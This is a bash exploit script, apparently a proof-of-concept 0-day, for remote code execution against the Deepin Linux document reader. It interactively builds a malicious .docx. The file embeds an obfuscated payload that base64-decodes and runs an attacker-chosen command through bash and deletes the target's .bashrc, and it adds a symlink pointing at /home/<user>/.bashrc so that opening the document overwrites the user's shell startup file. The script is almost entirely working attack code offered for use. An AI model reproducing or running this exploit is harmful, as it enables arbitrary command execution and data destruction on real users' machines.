deepin-reader_exploit.sh

#!/bin/bash

myBanner(){
echo "
╔╦╗┌─┐┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐  
 ║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘  
═╩╝└─┘└─┘┴  ┴┘└┘   ╩╚═└─┘┴ ┴─┴┘└─┘┴└─  
╦═╗╔═╗╔═╗  ╔═╗─┐ ┬┌─┐┬  ┌─┐┬┌┬┐        
╠╦╝║  ║╣   ║╣ ┌┴┬┘├─┘│  │ ││ │         
╩╚═╚═╝╚═╝  ╚═╝┴ └─┴  ┴─┘└─┘┴ ┴         
0-day

[Affected Operating System: Deepin Linux]
                                                    -by Febin (@febin_nj)          
"

}

checkPandoc(){

if [ $(which pandoc) ]
then
echo "[+] Pandoc is installed!"
else
echo "[-] Pandoc is not installed! Install pandoc to run this exploit.."
exit
fi
}

mainProgram(){

printf "

[    This Exploit will craft a malicious document (.docx) from the specified TEXT file  and store the malicious docx under output/ directory ]

"
mkdir output 2>/dev/null

printf " [>] Path to your TEXT file (default = ./sample.txt): "
read html_file
html_file=${html_file:-./sample.txt}

printf " [>] Enter the target username: "
read username

printf " [>] Enter the oneliner command to execute on target: "
read cmd

if [ -e "$html_file" ]
then
cp "$html_file" out.html
else
echo "[-] The specified txt file doesn't exist!"
exit
fi

b64cmd=$(echo "$cmd"|base64)

payload="<p>/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #</p>"
echo "${payload}$(printf '\n') $(cat out.html)" > out.html

pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html

rm -rf out.html
mkdir word 2>/dev/null

ln -s /home/${username}/.bashrc word/temp.html
zip -u -y output/mal.docx word/temp.html >/dev/null

rm -rf word/

echo "[+] Malicious document is written to: $(realpath output/mal.docx)"

}

myBanner
checkPandoc
mainProgram